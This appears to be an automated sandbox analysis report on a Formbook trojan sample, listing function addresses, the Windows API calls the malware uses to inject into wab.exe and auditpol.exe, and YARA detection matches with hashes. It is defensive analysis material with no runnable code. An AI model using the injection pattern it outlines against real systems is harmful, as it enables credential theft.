Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03693010 NtOpenDirectoryObject,		10_2_03693010
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03693090 NtSetValueKey,		10_2_03693090
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692B80 NtQueryInformationFile,		10_2_03692B80
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692AB0 NtWaitForSingleObject,		10_2_03692AB0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692F60 NtCreateProcessEx,		10_2_03692F60
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692FA0 NtQuerySection,		10_2_03692FA0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692F90 NtProtectVirtualMemory,		10_2_03692F90
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692E30 NtWriteVirtualMemory,		10_2_03692E30
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692EA0 NtAdjustPrivilegesToken,		10_2_03692EA0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03693D70 NtOpenThread,		10_2_03693D70
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692D00 NtSetInformationFile,		10_2_03692D00
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03693D10 NtOpenProcessToken,		10_2_03693D10
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692DB0 NtEnumerateKey,		10_2_03692DB0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692C00 NtQueryInformationProcess,		10_2_03692C00
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692CF0 NtOpenProcess,		10_2_03692CF0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03692CC0 NtQueryVirtualMemory,		10_2_03692CC0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_029C9250 NtAllocateVirtualMemory,		10_2_029C9250
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_029C90E0 NtClose,		10_2_029C90E0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_029C9030 NtDeleteFile,		10_2_029C9030
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_029C8F40 NtReadFile,		10_2_029C8F40
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_029C8DD0 NtCreateFile,		10_2_029C8DD0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0347F9F3 NtSetContextThread,NtResumeThread,		10_2_0347F9F3

Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Code function: 0_2_00007FFD9B8833D0		0_2_00007FFD9B8833D0
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Code function: 0_2_00007FFD9B88BF11		0_2_00007FFD9B88BF11
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Code function: 0_2_00007FFD9B88BA89		0_2_00007FFD9B88BA89
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Code function: 0_2_00007FFD9B88B2D3		0_2_00007FFD9B88B2D3
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Code function: 0_2_00007FFD9B8845F0		0_2_00007FFD9B8845F0
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Code function: 0_2_00007FFD9B88E895		0_2_00007FFD9B88E895
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Code function: 0_2_00007FFD9B950068		0_2_00007FFD9B950068
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_00418703		1_2_00418703
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_004168CE		1_2_004168CE
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_004168D3		1_2_004168D3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_0040E17D		1_2_0040E17D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_00410103		1_2_00410103
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_0040E183		1_2_0040E183
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_00402AC0		1_2_00402AC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_00403420		1_2_00403420
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_0042EDF3		1_2_0042EDF3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_0040FEE3		1_2_0040FEE3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_00402790		1_2_00402790
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E9D2F0		1_2_02E9D2F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F212ED		1_2_02F212ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E9B2C0		1_2_02E9B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E852A0		1_2_02E852A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F20274		1_2_02F20274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F403E6		1_2_02F403E6
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E8E3F0		1_2_02E8E3F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EC739A		1_2_02EC739A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F3A352		1_2_02F3A352
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6D34C		1_2_02E6D34C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F3132D		1_2_02F3132D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F3F0E0		1_2_02F3F0E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F370E9		1_2_02F370E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E870C0		1_2_02E870C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F2F0CC		1_2_02F2F0CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F381CC		1_2_02F381CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E8B1B0		1_2_02E8B1B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F401AA		1_2_02F401AA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB516C		1_2_02EB516C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F172		1_2_02E6F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F4B16B		1_2_02F4B16B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E70100		1_2_02E70100
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F1A118		1_2_02F1A118
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E9C6E0		1_2_02E9C6E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F316CC		1_2_02F316CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E7C7C0		1_2_02E7C7C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F3F7B0		1_2_02F3F7B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E80770		1_2_02E80770
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA4750		1_2_02EA4750
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F2E4F6		1_2_02F2E4F6
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E71460		1_2_02E71460
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F32446		1_2_02F32446
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F3F43F		1_2_02F3F43F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F1D5B0		1_2_02F1D5B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F40591		1_2_02F40591
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F37571		1_2_02F37571
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E80535		1_2_02E80535
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F2DAC6		1_2_02F2DAC6
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EC5AA0		1_2_02EC5AA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F1DAAC		1_2_02F1DAAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E7EA80		1_2_02E7EA80
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF3A6C		1_2_02EF3A6C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F37A46		1_2_02F37A46
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F3FA49		1_2_02F3FA49
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EBDBF9		1_2_02EBDBF9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F36BD7		1_2_02F36BD7
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E9FB80		1_2_02E9FB80
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F3FB76		1_2_02F3FB76
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F3AB40		1_2_02F3AB40
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E838E0		1_2_02E838E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EAE8F0		1_2_02EAE8F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E668B8		1_2_02E668B8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E82840		1_2_02E82840
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E8A840		1_2_02E8A840
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E829A0		1_2_02E829A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F4A9A6		1_2_02F4A9A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E96962		1_2_02E96962
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E89950		1_2_02E89950
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E9B950		1_2_02E9B950
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F3EEDB		1_2_02F3EEDB
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E89EB0		1_2_02E89EB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F3CE93		1_2_02F3CE93
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E92E90		1_2_02E92E90
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E80E59		1_2_02E80E59
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F3EE26		1_2_02F3EE26
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E72FC8		1_2_02E72FC8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F3FFB1		1_2_02F3FFB1
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E81F92		1_2_02E81F92
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF4F40		1_2_02EF4F40
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EC2F28		1_2_02EC2F28
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA0F30		1_2_02EA0F30
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F3FF09		1_2_02F3FF09
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F3FCF2		1_2_02F3FCF2
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E70CF2		1_2_02E70CF2
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F20CB5		1_2_02F20CB5
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF9C32		1_2_02EF9C32
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E80C00		1_2_02E80C00
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E7ADE0		1_2_02E7ADE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E9FDC0		1_2_02E9FDC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E98DBF		1_2_02E98DBF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F37D73		1_2_02F37D73
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E83D40		1_2_02E83D40
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F31D5A		1_2_02F31D5A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E8AD00		1_2_02E8AD00
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0371A352		10_2_0371A352
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0364D34C		10_2_0364D34C
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0371132D		10_2_0371132D
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_037203E6		10_2_037203E6
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0366E3F0		10_2_0366E3F0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_036A739A		10_2_036A739A
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03700274		10_2_03700274
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0367D2F0		10_2_0367D2F0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_037012ED		10_2_037012ED
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0367B2C0		10_2_0367B2C0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_036652A0		10_2_036652A0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0369516C		10_2_0369516C
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0364F172		10_2_0364F172
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0372B16B		10_2_0372B16B
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_036E8158		10_2_036E8158
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03650100		10_2_03650100
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_036FA118		10_2_036FA118
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_037181CC		10_2_037181CC
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0366B1B0		10_2_0366B1B0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_037201AA		10_2_037201AA
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0371F0E0		10_2_0371F0E0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_037170E9		10_2_037170E9
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_036670C0		10_2_036670C0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0370F0CC		10_2_0370F0CC
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03660770		10_2_03660770
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03684750		10_2_03684750
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0365C7C0		10_2_0365C7C0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0371F7B0		10_2_0371F7B0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0367C6E0		10_2_0367C6E0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_037116CC		10_2_037116CC
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03717571		10_2_03717571
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03660535		10_2_03660535
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_036FD5B0		10_2_036FD5B0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03720591		10_2_03720591
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03651460		10_2_03651460
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03712446		10_2_03712446
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0371F43F		10_2_0371F43F
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0370E4F6		10_2_0370E4F6
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0371FB76		10_2_0371FB76
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0371AB40		10_2_0371AB40
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0369DBF9		10_2_0369DBF9
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_036D5BF0		10_2_036D5BF0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03716BD7		10_2_03716BD7
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0367FB80		10_2_0367FB80
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_036D3A6C		10_2_036D3A6C
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03717A46		10_2_03717A46
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0371FA49		10_2_0371FA49
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0370DAC6		10_2_0370DAC6
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_036FDAAC		10_2_036FDAAC
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_036A5AA0		10_2_036A5AA0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0365EA80		10_2_0365EA80
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03676962		10_2_03676962
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03669950		10_2_03669950
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0367B950		10_2_0367B950
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_036629A0		10_2_036629A0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0372A9A6		10_2_0372A9A6
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03662840		10_2_03662840
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0366A840		10_2_0366A840
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_036CD800		10_2_036CD800
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_036638E0		10_2_036638E0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0368E8F0		10_2_0368E8F0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_036468B8		10_2_036468B8
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_036D4F40		10_2_036D4F40
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_036A2F28		10_2_036A2F28
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03680F30		10_2_03680F30
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0371FF09		10_2_0371FF09
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03652FC8		10_2_03652FC8
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0371FFB1		10_2_0371FFB1
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03661F92		10_2_03661F92
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03660E59		10_2_03660E59
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0371EE26		10_2_0371EE26
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0371EEDB		10_2_0371EEDB
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03669EB0		10_2_03669EB0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0371CE93		10_2_0371CE93
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03672E90		10_2_03672E90
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03717D73		10_2_03717D73
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03663D40		10_2_03663D40
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03711D5A		10_2_03711D5A
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0366AD00		10_2_0366AD00
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0365ADE0		10_2_0365ADE0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0367FDC0		10_2_0367FDC0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03678DBF		10_2_03678DBF
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_036D9C32		10_2_036D9C32
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03660C00		10_2_03660C00
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0371FCF2		10_2_0371FCF2
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03650CF2		10_2_03650CF2
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03700CB5		10_2_03700CB5
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_029B1950		10_2_029B1950
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_029B3230		10_2_029B3230
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_029B322B		10_2_029B322B
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_029B5060		10_2_029B5060
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_029A1125		10_2_029A1125
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_029CB750		10_2_029CB750
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_029AAADA		10_2_029AAADA
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_029AAAE0		10_2_029AAAE0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_029ACA60		10_2_029ACA60
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_029AC840		10_2_029AC840
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0347E354		10_2_0347E354
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0347E238		10_2_0347E238
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0347D758		10_2_0347D758
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0347D725		10_2_0347D725
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0347E6F8		10_2_0347E6F8
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0348543F		10_2_0348543F
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0347CA03		10_2_0347CA03

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 02EEEA12 appears 84 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 02EFF290 appears 103 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 02EC7E54 appears 85 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 02EB5130 appears 36 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 02E6B970 appears 248 times
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: String function: 036DF290 appears 103 times
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: String function: 03695130 appears 36 times
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: String function: 036CEA12 appears 86 times
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: String function: 0364B970 appears 250 times
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: String function: 036A7E54 appears 93 times

Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6796 -s 1020

Source: RN# D7521-RN-00353 REV-2.exe

Static PE information: No import functions for PE file found

Source: RN# D7521-RN-00353 REV-2.exe, 00000000.00000000.1680263736.000001C076C42000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameTransponer.exe6 vs RN# D7521-RN-00353 REV-2.exe
Source: RN# D7521-RN-00353 REV-2.exe	Binary or memory string: OriginalFilenameTransponer.exe6 vs RN# D7521-RN-00353 REV-2.exe

Source: 1.2.wab.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 1.2.wab.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.4128918801.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.2015274046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.4128970770.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.4131269057.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.2015330736.0000000000570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
